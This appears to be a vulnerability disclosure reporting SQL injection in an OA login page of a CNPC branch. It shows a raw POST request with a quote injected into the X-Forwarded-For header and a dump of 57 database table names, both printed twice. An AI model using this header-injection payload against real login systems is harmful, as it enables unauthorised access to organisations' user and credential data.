SQL Injection exists in the OA system of a branch of CNPC

SQL Injection exists in the OA system of a branch of CNPC

An OA of CNPC has SQL Injection

Detailed description:

POST /Login1.aspx HTTP/1.1Host: **.**.**.**:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**:8080/Login1.aspxCookie: ASP.NET_SessionId=k5buk355k0wzkwymk54owzy3X-Forwarded-For: **.**.**.**'Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 246__VIEWSTATE=%2FwEPDwULLTE5OTkxNTMyOTVkZC%2FxeQSdZ4eJYLqEiYjhLANZe3I1&__EVENTVALIDATION=%2FwEWBQKBwrmMCgKvt6W7BALAsIjcCwKU8abfBgKM54rGBvmRUhl4M%2B1JmYWr28ehnma41gF0&Text_User=123&Text_PWD=123&txtValue=%E5%AF%86%E7%A0%81&Button1=%E7%99%BB+%E5%BD%95

Database: HSBG

[57 tables]

+ --------------------------------- +

| Dbo. ActivityArrangement |

| Dbo. ActivityRemind |

| Dbo. BASE_Application |

| Dbo. BASE_Model |

| Dbo. BASE_OA_Inform |

| Dbo. BASE_Operation |

| Dbo. BASE_OrganiseUnit |

| Dbo. BASE_OrganiseUnit_Rule |

| Dbo. BASE_Role |

| Dbo. BASE_Role_Model |

| Dbo. BASE_Role_New |

| Dbo. BASE_Role_Rule |

| Dbo. BASE_User |

| Dbo. BASE_User_Class |

| Dbo. BASE_User_OrganiseUnit |

| Dbo. BASE_User_Position |

| Dbo. BASE_User_Role |

| Dbo. BASE_User_Role_New |

| Dbo. BASE_User_Rule |

| Dbo. BASE_User_Score |

| Dbo. BASE_User_Syn |

| Dbo. Comprasion |

| Dbo. DutyAttach |

| Dbo. HSBG_DEL |

| Dbo. HSBG_Message |

| Dbo. HSBG_UserInfo |

| Dbo. IPFilter |

| Dbo. MessagePool |

| Dbo. Notice |

| Dbo. Office_Message |

| Dbo. Office_MessageType |

| Dbo. Office_MessageType_bak |

| Dbo. Office_Message_Log |

| Dbo. Office_Message_Rank |

| Dbo. Office_Message_ReplyMessage |

| Dbo. Office_Message_Send_Lync |

| Dbo. Office_Message_Status |

| Dbo. Office_Minutes_List |

| Dbo. Office_Minutes_Record |

| Dbo. Office_Minutes_Schedule |

| Dbo. Office_Schedule_Message |

| Dbo. Office_Tasks_Remind |

| Dbo. Office_UserComplain |

| Dbo. PROC_BG12_CARMANAGEMENT |

| Dbo. PersonTb_SystemUserID |

| Dbo. RemindPerson |

| Dbo. SSO_Application |

| Dbo. SSO_User_Message |

| Dbo. Sys_Suggestions |

| Dbo. V_CurrentMonth_Message |

| Dbo. V_CurrentWeek_Message |

| Dbo. V_NoReplyMessageID |

| Dbo. V_PA_CalcMonth |

| Dbo. V_PA_SHOW |

| Dbo. V_UserOrganiseUnit |

| Dbo. Workflow_CallCar |

| Dbo. sysdiagrams |

+ --------------------------------- +

Proof of vulnerability:

POST /Login1.aspx HTTP/1.1Host: **.**.**.**:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**:8080/Login1.aspxCookie: ASP.NET_SessionId=k5buk355k0wzkwymk54owzy3X-Forwarded-For: **.**.**.**'Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 246__VIEWSTATE=%2FwEPDwULLTE5OTkxNTMyOTVkZC%2FxeQSdZ4eJYLqEiYjhLANZe3I1&__EVENTVALIDATION=%2FwEWBQKBwrmMCgKvt6W7BALAsIjcCwKU8abfBgKM54rGBvmRUhl4M%2B1JmYWr28ehnma41gF0&Text_User=123&Text_PWD=123&txtValue=%E5%AF%86%E7%A0%81&Button1=%E7%99%BB+%E5%BD%95

Database: HSBG

[57 tables]

+ --------------------------------- +

| Dbo. ActivityArrangement |

| Dbo. ActivityRemind |

| Dbo. BASE_Application |

| Dbo. BASE_Model |

| Dbo. BASE_OA_Inform |

| Dbo. BASE_Operation |

| Dbo. BASE_OrganiseUnit |

| Dbo. BASE_OrganiseUnit_Rule |

| Dbo. BASE_Role |

| Dbo. BASE_Role_Model |

| Dbo. BASE_Role_New |

| Dbo. BASE_Role_Rule |

| Dbo. BASE_User |

| Dbo. BASE_User_Class |

| Dbo. BASE_User_OrganiseUnit |

| Dbo. BASE_User_Position |

| Dbo. BASE_User_Role |

| Dbo. BASE_User_Role_New |

| Dbo. BASE_User_Rule |

| Dbo. BASE_User_Score |

| Dbo. BASE_User_Syn |

| Dbo. Comprasion |

| Dbo. DutyAttach |

| Dbo. HSBG_DEL |

| Dbo. HSBG_Message |

| Dbo. HSBG_UserInfo |

| Dbo. IPFilter |

| Dbo. MessagePool |

| Dbo. Notice |

| Dbo. Office_Message |

| Dbo. Office_MessageType |

| Dbo. Office_MessageType_bak |

| Dbo. Office_Message_Log |

| Dbo. Office_Message_Rank |

| Dbo. Office_Message_ReplyMessage |

| Dbo. Office_Message_Send_Lync |

| Dbo. Office_Message_Status |

| Dbo. Office_Minutes_List |

| Dbo. Office_Minutes_Record |

| Dbo. Office_Minutes_Schedule |

| Dbo. Office_Schedule_Message |

| Dbo. Office_Tasks_Remind |

| Dbo. Office_UserComplain |

| Dbo. PROC_BG12_CARMANAGEMENT |

| Dbo. PersonTb_SystemUserID |

| Dbo. RemindPerson |

| Dbo. SSO_Application |

| Dbo. SSO_User_Message |

| Dbo. Sys_Suggestions |

| Dbo. V_CurrentMonth_Message |

| Dbo. V_CurrentWeek_Message |

| Dbo. V_NoReplyMessageID |

| Dbo. V_PA_CalcMonth |

| Dbo. V_PA_SHOW |

| Dbo. V_UserOrganiseUnit |

| Dbo. Workflow_CallCar |

| Dbo. sysdiagrams |

+ --------------------------------- +

Not going deep.